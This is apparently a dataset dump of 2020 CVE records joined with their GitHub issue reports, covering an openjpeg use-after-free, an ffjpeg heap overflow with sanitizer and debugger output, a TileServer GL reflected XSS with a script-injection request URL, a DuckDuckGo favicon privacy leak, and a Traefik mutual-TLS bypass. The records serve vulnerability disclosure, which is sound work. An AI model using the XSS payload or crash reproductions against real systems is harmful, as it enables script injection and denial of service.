[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/uclouvain/openjpeg/issues/1261" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/07/msg00008.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://pastebin.com/4sDKQ7U8" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202101-29" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2021/dsa-4882" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/uclouvain/openjpeg/issues/1261" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/07/msg00008.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://pastebin.com/4sDKQ7U8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202101-29" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2021/dsa-4882" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:uclouvain:openjpeg:*:*:*:*:*:*:*:*", "matchCriteriaId": "0142BF7B-EBFC-4EAD-87C8-7D0FFF7E9486", "versionEndExcluding": null, "versionEndIncluding": "2.3.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:oracle:outside_in_technology:8.5.4:*:*:*:*:*:*:*", "matchCriteriaId": "72F1A960-EBA5-4BDB-B629-20F0D2384562", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:outside_in_technology:8.5.5:*:*:*:*:*:*:*", "matchCriteriaId": "3198F822-43F8-4CB3-97F7-C2982FDA5CBD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/uclouvain/openjpeg/issues/1261
[ "Patch", "Third Party Advisory" ]
github.com
[ "uclouvain", "openjpeg" ]
There is a heap use-after-free vulnerability in openjpeg/build/bin/libopenjp2.so.7. I would also like to request a CVE if that's okay or I can do it myself if you're busy, no worries. Here is the ASAN output: [out.txt](https://github.com/uclouvain/openjpeg/files/4842045/out.txt) Here is the command executed to reproduce the issue: ./opj_decompress -ImgDir Inputs/ -OutFor PGM If you would also like the files I have in the Inputs/, let me know and I can find a way to provide them.
Heap use-after-free
https://api.github.com/repos/uclouvain/openjpeg/issues/1261/comments
6
2020-06-28T10:06:42Z
2020-06-30T20:05:15Z
https://github.com/uclouvain/openjpeg/issues/1261
646,886,328
1,261
1,328
CVE-2020-15470
2020-07-01T11:15:10.880
ffjpeg through 2020-02-24 has a heap-based buffer overflow in jfif_decode in jfif.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/rockcarry/ffjpeg/issues/26" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/rockcarry/ffjpeg/issues/26" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rockcarry:ffjpeg:*:*:*:*:*:*:*:*", "matchCriteriaId": "E6FB3E34-01AE-4929-99A3-4A246FC15008", "versionEndExcluding": null, "versionEndIncluding": "2020-02-24", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/rockcarry/ffjpeg/issues/26
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "rockcarry", "ffjpeg" ]
ffjpeg "jfif_decode()" function heap-overflow vulnerability Description: There is a heap-overflow bug in jfif_decode(void *ctxt, BMP *pb) function at ffjpeg/src/jfif.c : line 516. An attacker can exploit this bug to cause a Denial of Service (DoS) by submitting a malicious jpeg image. The bug is caused by the following dangerous memcpy calling in jfif_decode() function: for (i=0; i<8; i++) { memcpy(idst, isrc, 8 * sizeof(int)); idst += yuv_stride[c]; isrc += 8; } We used AddressSanitizer instrumented in ffjpeg and triggered this bug, the asan output is: root@01964a1f36aa:~/ffjpeg/src# ./ffjpeg -d ../crashout/SIGABRT.PC.43a618.STACK.186c7604dd.CODE.-6.ADDR.0.INSTR.pushq__\$0x0.fuzz ================================================================= ==40906==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f3d587ffc00 at pc 0x0000004a6134 bp 0x7ffe72bc97d0 sp 0x7ffe72bc8f80 WRITE of size 32 at 0x7f3d587ffc00 thread T0 #0 0x4a6133 in __asan_memcpy /root/llvm-project/llvm/projects/compiler/lib/asan/asan_interceptors_memintrinsics.cc:22 #1 0x4f24df in jfif_decode (/root/ffjpeg/src/ffjpeg+0x4f24df) #2 0x4eb545 in main (/root/ffjpeg/src/ffjpeg+0x4eb545) #3 0x7f3d5badeb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 #4 0x41ac89 in _start (/root/ffjpeg/src/ffjpeg+0x41ac89) 0x7f3d587ffc00 is located 1024 bytes to the right of 4194304-byte region [0x7f3d583ff800,0x7f3d587ff800) allocated by thread T0 here: #0 0x4a71a0 in malloc /root/llvm-project/llvm/projects/compiler/lib/asan/asan_malloc_linux.cc:145 #1 0x4f132b in jfif_decode (/root/ffjpeg/src/ffjpeg+0x4f132b) #2 0x4eb545 in main (/root/ffjpeg/src/ffjpeg+0x4eb545) #3 0x7f3d5badeb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: heap-buffer-overflow /root/llvm-project/llvm/projects/compiler/lib/asan/asan_interceptors_memintrinsics.cc:22 in __asan_memcpy Shadow bytes around the buggy address: 0x0fe82b0f7f30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fe82b0f7f40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fe82b0f7f50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fe82b0f7f60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fe82b0f7f70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0fe82b0f7f80:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fe82b0f7f90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fe82b0f7fa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fe82b0f7fb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fe82b0f7fc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fe82b0f7fd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==40906==ABORTING ASAN telled us there is a heap-buffer-overflow on 0x4f24df in jfif_decode (/root/ffjpeg/src/ffjpeg+0x4f24df) Then we used IDA to locate this triggered bug. ![image](https://user-images.githubusercontent.com/23331814/86086326-0cdf1100-bad4-11ea-817c-ee9580435b9d.png) Lastly, we used GDB to debug this bug, the GDB outputs: gdb-peda$ b * 0x4f24df Breakpoint 1 at 0x4f24df gdb-peda$ r Starting program: /root/ffjpeg/src/ffjpeg -d hh [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] RAX: 0x7ffff36ff800 --> 0xbebebebebebebebe RBX: 0x7fffffffdd00 --> 0x3e7620 (' v>') RCX: 0x7fffffffdbc0 --> 0x7ad90c007af07c RDX: 0x20 (' ') RSI: 0x7fffffffdbc0 --> 0x7ad90c007af07c RDI: 0x7ffff36ff800 --> 0xbebebebebebebebe RBP: 0x7fffffffe3d0 --> 0x7fffffffe510 --> 0x501c10 (<__libc_csu_init>: push r15) RSP: 0x7fffffffda58 --> 0x4f24e0 (<jfif_decode+8448>: movsxd rcx,DWORD PTR [rbx+0x638]) RIP: 0xffffffffcd4a5e60 R8 : 0xc2a00000000 --> 0x0 R9 : 0x0 R10: 0x10007fff7b98 --> 0xf3f3f3f3f3f3f3f3 R11: 0x10007fff7b78 --> 0x0 R12: 0x7fffffffe400 --> 0x0 R13: 0x80 R14: 0x10007fff7b4c --> 0xf1f1f1f1 --> 0x0 R15: 0x615000000080 --> 0xffff0000ffee EFLAGS: 0x10293 (CARRY parity ADJUST zero SIGN trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] Invalid $PC address: 0xffffffffcd4a5e60 [------------------------------------stack-------------------------------------] 0000| 0x7fffffffda58 --> 0x4f24e0 (<jfif_decode+8448>: movsxd rcx,DWORD PTR [rbx+0x638]) 0008| 0x7fffffffda60 --> 0x41b58ab3 0016| 0x7fffffffda68 --> 0x5155e8 ("6 32 128 4 ftab 192 16 2 dc 224 12 10 yuv_stride 256 12 10 yuv_height 288 24 10 yuv_datbuf 352 256 2 du") 0024| 0x7fffffffda70 --> 0x4f03e0 (<jfif_decode>: push rbp) 0032| 0x7fffffffda78 --> 0x3a (':') 0040| 0x7fffffffda80 --> 0x6110000002c0 --> 0xc7b00000d00 --> 0x0 0048| 0x7fffffffda88 --> 0x611000000400 --> 0x136b00000e00 0056| 0x7fffffffda90 --> 0x0 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0xffffffffcd4a5e60 in ?? () We ensured there is a heap overflow because of the dangerous using of memcpy function, attacker can use this bug to finish a DoS attack. You can reproduce this heap overflow vulnerability by the follow step: ffjpeg -d [PoC_heapoverflow1_ffjpeg](https://github.com/yangjiageng/PoC/blob/master/PoC_heapoverflow1_ffjpeg)
ffjpeg "jfif_decode()" function heap-overflow vulnerability
https://api.github.com/repos/rockcarry/ffjpeg/issues/26/comments
3
2020-06-30T05:18:26Z
2020-12-02T00:21:37Z
https://github.com/rockcarry/ffjpeg/issues/26
647,869,169
26
1,329
CVE-2020-15500
2020-07-01T23:15:10.333
An issue was discovered in server.js in TileServer GL through 3.0.0. The content of the key GET parameter is reflected unsanitized in an HTTP response for the application's main page, causing reflected XSS.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/162193/Tileserver-gl-3.0.0-Cross-Site-Scripting.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/maptiler/tileserver-gl/issues/461" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/162193/Tileserver-gl-3.0.0-Cross-Site-Scripting.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/maptiler/tileserver-gl/issues/461" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tileserver:tileservergl:*:*:*:*:*:*:*:*", "matchCriteriaId": "96936A8C-DA3A-45DD-8105-D3B7AA4D4AA1", "versionEndExcluding": null, "versionEndIncluding": "3.0.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/maptiler/tileserver-gl/issues/461
[ "Exploit", "Third Party Advisory" ]
github.com
[ "maptiler", "tileserver-gl" ]
Hi, I stumbled upon a reflected XSS in the software. It stems from reflecting unsanitized user controller input directly to the HTTP response. I initially observed this in Tileserver GL 2.5, but from the looks of it it's still present in the current `master`. Vulnerable request example: ``` https://example.org/?key=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E ``` The code in question is here https://github.com/maptiler/tileserver-gl/blob/master/src/server.js#L322-L323
Reflected XSS vulnerability in the application main page
https://api.github.com/repos/maptiler/tileserver-gl/issues/461/comments
0
2020-07-01T17:12:34Z
2020-07-02T07:50:50Z
https://github.com/maptiler/tileserver-gl/issues/461
649,140,488
461
1,331
CVE-2020-15502
2020-07-02T11:15:10.823
The DuckDuckGo application through 5.58.0 for Android, and through 7.47.1.0 for iOS, sends hostnames of visited web sites within HTTPS .ico requests to servers in the duckduckgo.com domain, which might make visit data available temporarily at a Potentially Unwanted Endpoint. NOTE: the vendor has stated "the favicon service adheres to our strict privacy policy.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/duckduckgo/Android/blob/e2f2d54a6b4452277467db403a3546512401b493/app/src/main/java/com/duckduckgo/app/global/UriExtension.kt#L83-L88" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/duckduckgo/Android/issues/527" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/duckduckgo/iOS/blob/1ae03d7221180bd6791cf6f7f06922a96335cf75/Core/AppUrls.swift#L98-L100" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://news.ycombinator.com/item?id=23708166" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://news.ycombinator.com/item?id=23711597" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/duckduckgo/Android/blob/e2f2d54a6b4452277467db403a3546512401b493/app/src/main/java/com/duckduckgo/app/global/UriExtension.kt#L83-L88" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/duckduckgo/Android/issues/527" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/duckduckgo/iOS/blob/1ae03d7221180bd6791cf6f7f06922a96335cf75/Core/AppUrls.swift#L98-L100" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://news.ycombinator.com/item?id=23708166" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://news.ycombinator.com/item?id=23711597" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:duckduckgo:duckduckgo:*:*:*:*:*:android:*:*", "matchCriteriaId": "EB112090-6A82-49D0-B4C3-498308F273C2", "versionEndExcluding": null, "versionEndIncluding": "5.58.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:duckduckgo:duckduckgo:*:*:*:*:*:iphone_os:*:*", "matchCriteriaId": "66B01E09-E2B4-4C64-85D0-55F598432564", "versionEndExcluding": null, "versionEndIncluding": "7.47.1.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "200" ]
200
https://github.com/duckduckgo/Android/issues/527
[ "Third Party Advisory" ]
github.com
[ "duckduckgo", "Android" ]
https://github.com/duckduckgo/Android/blob/ed91c9e551d2a9e1559199f110bd94c076784c71/app/src/main/java/com/duckduckgo/app/global/UriExtension.kt#L60 This seems to be leaking all(?) the domains that users visit to your servers.
Domains visited get leaked to DDG servers
https://api.github.com/repos/duckduckgo/Android/issues/527/comments
96
2019-07-09T13:02:51Z
2022-05-16T16:34:00Z
https://github.com/duckduckgo/Android/issues/527
465,768,374
527
1,332
CVE-2019-20894
2020-07-02T16:15:11.357
Traefik 2.x, in certain configurations, allows HTTPS sessions to proceed without mutual TLS verification in a situation where ERR_BAD_SSL_CLIENT_AUTH_CERT should have occurred.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/containous/traefik/issues/5312" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/containous/traefik/issues/5312" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:*", "matchCriteriaId": "D3797D3C-EEE8-4FC6-9B4A-43DDF66C92AF", "versionEndExcluding": "2.0.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "295" ]
295
https://github.com/containous/traefik/issues/5312
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "containous", "traefik" ]
### Do you want to request a *feature* or report a *bug*? Bug ### Did you try using a 1.7.x configuration for the version 2.0? - [ ] Yes - [x] No ### What did you do? [Very good illustration](https://github.com/containous/traefik/issues/4260) of very related problem. I have 2 ingress routes with kubernetesCRD provider. First service expected to have ordinary LE and https. Second service expected to be served only with mutual TLS (mtls) My k8s definitions: ```yaml --- apiVersion: extensions/v1beta1 kind: Deployment metadata: name: meow spec: replicas: 1 selector: matchLabels: app: meow template: metadata: labels: app: meow spec: containers: - name: meow image: gcr.io/kubernetes-e2e-test-images/echoserver:2.1 ports: - containerPort: 8080 --- apiVersion: v1 kind: Service metadata: name: meow-svc spec: ports: - port: 80 targetPort: 8080 protocol: TCP name: http selector: app: meow --- apiVersion: traefik.containo.us/v1alpha1 kind: IngressRoute metadata: name: meow-svc-https spec: entryPoints: - https routes: - match: Host(`meow.example.com`) kind: Rule services: - name: meow-svc port: 80 middlewares: - name: test-header - name: passtlsclientcert tls: options: name: tls-with-client-verification --- apiVersion: traefik.containo.us/v1alpha1 kind: IngressRoute metadata: name: meow-svc-https-without-mtls spec: entryPoints: - https routes: - match: Host(`without-mtls.example.com`) kind: Rule services: - name: meow-svc port: 80 middlewares: - name: test-header - name: passtlsclientcert ## doesn't require mTLS tls: {} --- apiVersion: traefik.containo.us/v1alpha1 kind: TLSOption metadata: name: tls-with-client-verification labels: app: traefik chart: traefik-0.0.1 release: "traefik" heritage: "Tiller" spec: minVersion: "VersionTLS12" cipherSuites: [ "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256", "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384", "TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305", "TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305", "TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384", "TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256", "TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256" ] sniStrict: true clientAuth: secretNames: - my-tls-secret clientAuthType: "RequireAndVerifyClientCert" --- apiVersion: traefik.containo.us/v1alpha1 kind: Middleware metadata: name: passtlsclientcert spec: passTLSClientCert: pem: true --- apiVersion: traefik.containo.us/v1alpha1 kind: Middleware metadata: name: test-header spec: headers: customRequestHeaders: X-Script-Name: "added-by-testHeader" customResponseHeaders: X-Custom-Response-Header: "added-by-testHeader" ``` Test case 1. passed. ```bash curl https://meow.example.com/ --cert mtls/client.crt --key mtls/client.key 2>&1 | grep -i 'X-Forwarded-Tls-Client-Cert' # gives out: # x-forwarded-tls-client-cert=MIIE ............. %3D curl https://meow.example.com/ # gives out: # curl: (56) OpenSSL SSL_read: error:14094412:SSL routines:ssl3_read_bytes:sslv3 alert bad certificate, errno 0 ``` Test case 2. Failed. My chrome browser doesn't have client certificates/keys. I open my first service `without-mtls.example.com` (that does not require certs) in my chrome browser (make valid SSL handshakes and TCP connection over HTTP2) and after that, I open second `meow.example.com` page (that requires certs). Same behaviour with FireFox. ### What did you expect to see? Test case 1. I see error: `curl: (56) OpenSSL SSL_read: error:14094412:SSL routines:ssl3_read_bytes:sslv3 alert bad certificate, errno 0`. Test case 2: browser should show me **ERR_BAD_SSL_CLIENT_AUTH_CERT** error for `meow.example.com` page. Like it does in incognito for the same web page. ### What did you see instead? Test case 1. I see error: `curl: (56) OpenSSL SSL_read: error:14094412:SSL routines:ssl3_read_bytes:sslv3 alert bad certificate, errno 0`, as expected. Test case 2: browser shows me `meow.example.com` page **without** *ERR_BAD_SSL_CLIENT_AUTH_CERT* error. With headers. There is no header `x-forwarded-tls-client-cert` with client certificate. ### Output of `traefik version`: (_What version of Traefik are you using?_) ``` #$ kubectl exec traefik-bc58c9fd4-xrrsv /traefik version Version: 2.0.0-rc1 Codename: montdor Go version: go1.13rc1 Built: 2019-08-26T17:47:29Z OS/Arch: linux/amd64 ``` also tested on ``` Version: 2.0.0-rc2 Codename: montdor Go version: go1.13rc2 Built: 2019-09-03T20:10:11Z OS/Arch: linux/amd64 ``` ### What is your environment & configuration (arguments, toml, provider, platform, ...)? ```toml # traefik.toml [Global] checkNewVersion = true [log] level = "info" format = "json" [entryPoints] [entryPoints.http] address = ":80" [entryPoints.http.proxyProtocol] trustedIPs = ["192.168.128.0/18"] [entryPoints.https] address = ":443" [entryPoints.https.proxyProtocol] trustedIPs = ["192.168.128.0/18"] [api] dashboard = true [ping] [providers] [providers.kubernetesCRD] [certificatesResolvers] [certificatesResolvers.defaultResolver] [certificatesResolvers.defaultResolver.acme] KeyType = "RSA4096" email = "tomfun1990@gmail.com" storage = "/acme/acme_2.json" [certificatesResolvers.defaultResolver.acme.dnsChallenge] provider = "route53" ``` ### If applicable, please paste the log output in DEBUG level (`--log.level=DEBUG` switch) ``` [{"entryPointName":"https","level":"info","msg":"Trusted connection","time":"2019-09-06T13:22:50Z"},{"entryPointName":"https","level":"info","msg":"Use header remote addr","time":"2019-09-06T13:22:50Z"},{"entryPointName":"https","level":"info","msg":"Header parsed &{159.ip.striped.130:43792 192.168.107.142:443}","time":"2019-09-06T13:22:50Z"},{"entryPointName":"http","level":"info","msg":"Trusted connection","time":"2019-09-06T13:22:50Z"},{"entryPointName":"http","level":"info","msg":"Use header remote addr","time":"2019-09-06T13:22:50Z"},{"entryPointName":"http","level":"info","msg":"Header parsed &{192.168.107.142:2260 192.168.107.142:32724}","time":"2019-09-06T13:22:50Z"},{"Request":"{\"Method\":\"GET\",\"URL\":{\"Scheme\":\"https\",\"Opaque\":\"\",\"User\":null,\"Host\":\"without-mtls.example.com\",\"Path\":\"/\",\"RawPath\":\"\",\"ForceQuery\":false,\"RawQuery\":\"\",\"Fragment\":\"\"},\"Proto\":\"HTTP/2.0\",\"ProtoMajor\":2,\"ProtoMinor\":0,\"Header\":{\"Accept\":[\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\"],\"Accept-Encoding\":[\"gzip, deflate, br\"],\"Accept-Language\":[\"ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7,uk;q=0.6\"],\"Cache-Control\":[\"max-age=0\"],\"Dnt\":[\"1\"],\"Sec-Fetch-Mode\":[\"navigate\"],\"Sec-Fetch-Site\":[\"none\"],\"Sec-Fetch-User\":[\"?1\"],\"Upgrade-Insecure-Requests\":[\"1\"],\"User-Agent\":[\"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 